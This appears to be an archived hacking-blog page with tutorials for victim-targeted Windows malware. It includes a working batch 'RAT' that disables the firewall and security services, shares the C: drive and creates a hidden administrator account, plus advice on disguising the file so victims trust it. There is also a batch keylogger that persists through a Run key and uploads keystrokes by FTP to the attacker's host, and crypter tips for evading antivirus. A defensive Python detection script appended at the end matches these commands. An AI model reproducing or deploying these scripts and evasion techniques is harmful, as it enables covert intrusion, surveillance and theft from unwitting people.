Archive for the ‘Keyloggers Related Stuff’ Category

Ardamax Keylogger Tutorial

September 14, 2010 15 comments

Ardamax Keylogger is a keystroke recorder that captures the user’s activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. You can also use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, and access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for Windows 2000, XP, 2003, Vista and Windows 7.

Making a RAT in a batch file [NEW]

August 9, 2010 Leave a comment

As the title says, in this tutorial I am going to teach you how to create a RAT in cmd.
A Quick Guide to RATs

What is a RAT?

Well, to start off, the term RAT is short for Remote Administration Tool.
A quick definition of a RAT (Remote Administration Tool): RATs are used to connect to and manage one or more computers with a variety of tools, such as:

* Screen/camera capture or control
* File management (download/upload/execute/etc.)
* Shell control (usually piped from command prompt)
* Computer control (power off/on/log off)
* Registry management (query/add/delete/modify)
* Other product-specific function

Are RATS Legal/Illegal?

Well, it is actually both. There are RATs that are legal and RATs that are illegal. The difference between them is that legal RATs inform the connected remote that you are on the computer, and illegal RATs do NOT inform the remote that you are on the computer.
So basically, to break things down:

Legal means the person has full control as well: they can kill the connection any time they please, no backdoor is left on their PC, and it is in your network.

Illegal means the person does NOT know you are connected and has no knowledge that you are until you take action. They have no control to kill the connection (unless they unplug the internet), but even then, a backdoor is left on the computer, meaning any time the computer is on and the internet is up, you can connect whenever you want. You can destroy files, download files, steal information, and basically make their life miserable.

So I think by now you must have some basic knowledge of RATs.

Now we head on to our tutorial!

Simply paste the code underneath this into Notepad and save it as a .bat file, or .cmd if you’d like. Once your victim has run the file, his firewall and antivirus will be shut down and an account named ‘admin’ will be created with admin access. Under the code you’ll see how to get access.

@echo off
Cls
net share system=C:\ /unlimited
cls
Attrib +r +h C:\windows\startm~1\program\startup\trojan.bat
Cls
net stop SharedAccess
net stop “Security Center”
>>”%Temp%.kill.reg” ECHO REGEDIT4
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
START /WAIT REGEDIT /S “%Temp%.kill.reg”
del “%Temp%.kill.reg”
del %0
cls
net user Admin /add
net localgroup Administrators /add “Admin”
cls
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v “Admin” /t REG_DWORD /d 00 /f
cls
reg add “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ Messenger” /v Start /t REG_DWORD /d 002 /f
cls
net start Messenger
cls
netsh firewall set opmode mode=disable
cls
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v “admin” /t REG_DWORD /d 00 /f”
REG add “HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLEREGISTRYTOOLS /T REG_DWORD /D 0 /F”
Cls

Now make the victim open this file on his machine.
You can convert this .cmd/.bat file to an exe file and change the icon and other details to make the victim trust this file!

Okay, so when the victim has run the file, all you have to do is open cmd on your own computer and type in the following:

net use \\IP-of-your-victim admin

Example of how to use the above command

net use \\192.168.1.1 admin

Followed by the following code:

explorer \\IP-of-your-victim\system

Example of how to use the above command

explorer \\192.168.1.1\system

So the 2 lines would be like the following:

net use \\192.168.1.1 admin
explorer \\192.168.1.1\system

Obviously, edit the IPs.

PS. If you don’t know how to get the IP off of someone, go onto MSN and send them a file (Eventually do it with the batch file you sent with the RAT) and go into CMD and type in ‘netstat’, then try to identify it.

I will soon post a big thread on how to get the IP of a victim!

Your Own Crypter and How They Work [Pics][Source]

May 29, 2010 1 comment

Credits: Mudkip

Some things to know before you read this

* I have included an example source file, but don’t download it expecting to have a free FUD crypter
* This guide doesn’t cover every method of file undetection. I’m simply showing you one way you can decrease the number of detections your file gets.
* I’m not responsible for whatever shenanigans you pull with this information

What do anti-viruses look for in a file?
First off, you will need some basic understanding of how anti-viruses work. Exe files are simply lines of instruction, and each line is called an offset.
Antivirus products have databases of these lines that are known to be associated with malicious files. They use that database to check against your file to see if it matches. If it does, then it is marked as infected. They do use other methods of detection, but this is the one I will show you how to avoid.

What will the program need to do?
Your crypter is going to take the contents of an infected file, encrypt them, and place it at the bottom of a seemingly virus-free file called your “stub”.
Your stub file will then extract the encrypted data from itself, decrypt it, then extract and run it.

This may sound like a complicated and confusing process, but it isn’t. Here are some diagrams I made to show you what I mean:

Example Source
I’ve created an example program. I have not tested how FUD it will actually make a file, but I can guarantee it is not anywhere near 100%. The reason I did this is because I want YOU to make your crypters. If you think you are completely lost at this point, perhaps you are not ready yet. Read some VB6 tutorials, look at example programs, and learn! When you think you are ready, read through this whole thing again.

I’ve thoroughly commented the code to help you

http://www.mediafire.com/download.php?zncawy1ztzm

Other things you can do
What will be detected now is completely dependent on your stub.

Some things you can do to make your stub further undetected:

* Do NOT take code from other programs!
* Change your variable or function names around to random things. (ex. dim stubFile as string can become dim hdfKd9jsd as string)
* Do not include the word “stub” anywhere in your application.
* After you’ve built your stub, go through it with a hex editor and try to find the word “stub” and take it out. Sometimes it ends up in there without you meaning to put it there.
* Remove the version information from your stub. I recommend Resource Hacker for doing this.
* When calling APIs, use a function called CallApiByName. If you search around, I’m sure you will find an example of it.
* There are many other things you can do. Look around on Hack Forums or Hack Hound. There are lots of great discussions about undetection techniques.
* When test-scanning your file, use novirusthanks.org and check off “do not distribute.” If you scan it with virustotal, they will distribute your file among the AV’s.
* Try not to publicly distribute your crypter
* Don’t give up!

Batch Keylogger

April 28, 2010 Leave a comment

Open Notepad and copy and paste the following code, save it as Anything.bat and send it to someone.

Note: Please edit the line in the script to your own domain site so that the ID and PW can be saved.

@echo off
del C:\WINDOWS\TASKMAN.exe
echo set shell = CreateObject(“Wscript.Shell”) >> C:\windows\stsyk.vbs
echo shell.run “C:\windows\k.bat”, 0 >> C:\windows\stsyk.vbs
echo @echo off >> C:\windows\k.bat
echo color c9 >> C:\windows\k.bat
echo :go >> C:\windows\k.bat
echo echo .>>c:\keys.txt >> C:\windows\k.bat
echo echo : >> C:\windows\k.bat
echo set /p keys= >> C:\windows\k.bat
echo echo %keys%>>c:\keys.txt >> C:\windows\k.bat
echo @echo off >> C:\windows\k.bat
echo ftp >> C:\windows\k.bat
echo open Yoursite.hoster.com >> C:\windows\k.bat
echo username >> C:\windows\k.bat
echo password >> C:\windows\k.bat
echo put c:\keys.txt >> C:\windows\k.bat
echo quit >> C:\windows\k.bat
echo goto go >> C:\windows\k.bat
echo start C:\windows\stsyk.vbs >> C:\windows\k.bat
echo reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “stsyk.vbs” /d “C:\WINDOWS\”
start C:\windows\stsyk.vbs
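
Both batch scripts on this page (the "RAT" script in the earlier post and the keylogger above) work entirely through built-in Windows commands, so they leave recognisable command lines in process-creation logs. This added example, which is not code from the original posts, matches those command lines and escalates when one parent process creates, promotes and hides an account; the rule names, severity levels and sample events are constructed for illustration, and the `advfirewall` pattern extends the page's `netsh firewall` command to its newer equivalent.

```python
import re
from collections import defaultdict

# Rules mirror commands in the two batch scripts on this page (case-insensitive).
RULES = {name: re.compile(rx, re.I) for name, rx in [
    ("share_drive_root", r'\bnet1?(\.exe)?\s+share\s+\S+=[a-z]:\\?(\s|$)'),
    ("stop_security_service", r'\bnet1?(\.exe)?\s+stop\s+"?(sharedaccess|security center|wscsvc)'),
    ("local_account_created", r'\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b'),
    ("added_to_administrators", r'\bnet1?(\.exe)?\s+localgroup\s+"?administrators"?.*\s/add\b'),
    ("account_hidden_from_logon", r'\breg(\.exe)?\s+add\s+.*specialaccounts\\userlist.*\s/d\s+0+\b'),
    ("firewall_disabled", r'\bnetsh(\.exe)?\s+(firewall\s+set\s+opmode\s+(mode=)?disable'
                          r'|advfirewall\s+set\s+\S+\s+state\s+off)'),
    ("silent_reg_import", r'\bregedit(\.exe)?\s+/s\b'),
    ("run_key_script", r'\breg(\.exe)?\s+add\s+.*currentversion\\run\b.*\.(vbs|bat|cmd)\b'),
]}
# Account created, promoted and hidden by one parent process: treat as critical.
HIDDEN_ADMIN_CHAIN = {"local_account_created", "added_to_administrators",
                      "account_hidden_from_logon"}

def match_rules(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def triage(events):
    """Group rule hits by (host, parent pid) and assign a severity to each group."""
    hits = defaultdict(set)
    for ev in events:
        for name in match_rules(ev["cmd"]):
            hits[(ev["host"], ev["ppid"])].add(name)
    report = {}
    for key, names in hits.items():
        severity = ("critical" if HIDDEN_ADMIN_CHAIN <= names
                    else "high" if len(names) >= 2 else "review")
        report[key] = {"rules": names, "severity": severity}
    return report

# Constructed events (hosts, pids and the WS02 path are made up for this example).
SAMPLE = [
    {"host": "WS01", "ppid": 4120, "cmd": r'net share system=C:\ /unlimited'},
    {"host": "WS01", "ppid": 4120, "cmd": r'net stop "Security Center"'},
    {"host": "WS01", "ppid": 4120, "cmd": r'net user Admin /add'},
    {"host": "WS01", "ppid": 4120, "cmd": r'net localgroup Administrators /add "Admin"'},
    {"host": "WS01", "ppid": 4120, "cmd": r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT'
        r'\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Admin /t REG_DWORD /d 0 /f'},
    {"host": "WS01", "ppid": 4120, "cmd": r'netsh firewall set opmode mode=disable'},
    {"host": "WS02", "ppid": 812, "cmd": r'reg add "HKLM\SOFTWARE\Microsoft\Windows'
        r'\CurrentVersion\Run" /v "example.vbs" /d "C:\Users\Public\example.vbs"'},
    {"host": "WS03", "ppid": 77, "cmd": r'net user'},
]
```

Feed `triage` the command-line field from whatever process-creation source is available (for example Sysmon event ID 1 or Security event 4688 with command-line auditing enabled).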
